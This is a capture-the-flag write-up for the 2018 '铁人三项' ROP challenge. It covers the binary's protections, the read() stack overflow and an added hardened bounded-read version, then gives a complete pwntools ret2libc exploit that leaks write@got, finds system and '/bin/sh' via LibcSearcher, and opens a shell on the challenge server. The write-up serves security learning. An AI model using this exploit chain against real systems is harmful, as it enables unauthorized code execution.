
铁人三项(第五赛区)_2018_rop

Environment: ubuntu18


0x01


checksec

```
[*] '/home/zelas/Desktop/pwn/铁人三项(第五赛区)_2018_rop/2018_rop'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
```

NX is enabled, so the stack is not executable.

IDA

main()

```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  be_nice_to_people();
  vulnerable_function();
  return write(1, "Hello, World\n", 0xDu);
}
```

vulnerable_function()

```c
ssize_t vulnerable_function()
{
  char buf[136]; // [esp+10h] [ebp-88h] BYREF

  return read(0, buf, 0x100u); // read() has a stack overflow: 0x100 bytes into a 136-byte buffer
}
```
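The fix a defender wants for this function, as an added example that is not part of the writeup and not code from the challenge binary: the original `read()` call is kept only as a comment, and `hardened_function()` caps the read at `sizeof(buf)`. The pipe-based `feed_and_count()` helper is an assumption for testing and stands in for stdin.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 136   /* same size as buf in the decompiled vulnerable_function() */

/* Original (vulnerable) body from the challenge binary, for reference only:
 *
 *     char buf[136];
 *     return read(0, buf, 0x100u);   // 0x100 > sizeof(buf): writes past buf, saved ebp and ret
 */

/* Bounded read: never requests more than the buffer can hold and always
 * leaves room for a terminating NUL, so later string handling is safe too. */
ssize_t read_bounded(int fd, char *buf, size_t bufsz) {
    if (bufsz == 0) return -1;
    ssize_t n = read(fd, buf, bufsz - 1);
    if (n < 0) return n;
    buf[n] = '\0';
    return n;
}

/* Hardened version of vulnerable_function(): same stack buffer, capped read. */
ssize_t hardened_function(int fd) {
    char buf[BUF_SIZE];
    return read_bounded(fd, buf, sizeof buf);
}

/* Test helper (assumption: a pipe stands in for stdin): push `len` bytes of 'a'
 * through a pipe and return how many bytes hardened_function() accepted. */
ssize_t feed_and_count(size_t len) {
    int fds[2];
    if (pipe(fds) != 0) return -1;
    char *data = malloc(len ? len : 1);
    if (!data) { close(fds[0]); close(fds[1]); return -1; }
    memset(data, 'a', len);
    /* inputs of a few hundred bytes fit in the pipe buffer, so this write does not block */
    if (len && write(fds[1], data, len) != (ssize_t)len) {
        free(data); close(fds[0]); close(fds[1]); return -1;
    }
    close(fds[1]);
    ssize_t n = hardened_function(fds[0]);
    close(fds[0]);
    free(data);
    return n;
}

int main(void) {
    /* The 0x100-byte input size from the decompiled call is now truncated to 135 bytes. */
    printf("0x100-byte input accepted: %zd bytes\n", feed_and_count(0x100));
    printf("10-byte input accepted:    %zd bytes\n", feed_and_count(10));
    return 0;
}
```

With the cap in place the 0x100-byte input that overwrote the saved ebp and return address is cut off at 135 bytes, before it reaches the end of `buf`; short inputs pass through unchanged.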

0x02


Approach: ret2libc

  1. Use the read() overflow to leak the real address of write()
  2. Use LibcSearcher to compute the addresses of system() and the "/bin/sh" string
  3. Return into main() again, then call system()

Stack layout of the first payload (leak write()):

| Stack slot | Size / value |
|---|---|
| buf | 0x88 bytes |
| saved ebp | 0x4 bytes |
| return address | write() |
| return address of write() | main() |
| arg[0] | 0 |
| arg[1] | write_got |
| arg[2] | 0x4 |

Stack layout of the second payload (call system()):

| Stack slot | Size / value |
|---|---|
| buf | 0x88 bytes |
| saved ebp | 0x4 bytes |
| return address | system() |
| return address of system() | 0xdeadbeef |
| arg | bin_sh |

0x03


libc: libc6-i386_2.27-3ubuntu1_amd64

```python
from pwn import *
from LibcSearcher import *

context(os='linux', arch='i386', log_level='debug')
io = remote('node4.buuoj.cn', 29018)
# io = process(['./2018_rop'])
elf = ELF('./2018_rop')

# buf is at ebp-0x88: 0x88 bytes of buffer plus 4 bytes of saved ebp reach the return address
padding = 0x88 + 0x4
write_got = elf.got['write']
write_plt = elf.plt['write']
main_addr = elf.symbols['main']
# Stage 1: return into write@plt with main() as its return address and
# arguments (0, write_got, 4), which prints the real address of write() and then restarts main()
payload = b'a' * padding + p32(write_plt) + p32(main_addr) + p32(0) + p32(write_got) + p32(0x4)
io.sendline(payload)

write_addr = u32(io.recv(4))
print('[+] write_addr', hex(write_addr))

# Stage 2: identify the libc from the leaked write() address, then compute system() and "/bin/sh"
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
system = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')
ret = 0x08048199  # ret gadget placed before system()
payload1 = b'a' * padding + p32(ret) + p32(system) + p32(0xdeadbeef) + p32(bin_sh)
io.sendline(payload1)
io.interactive()
```

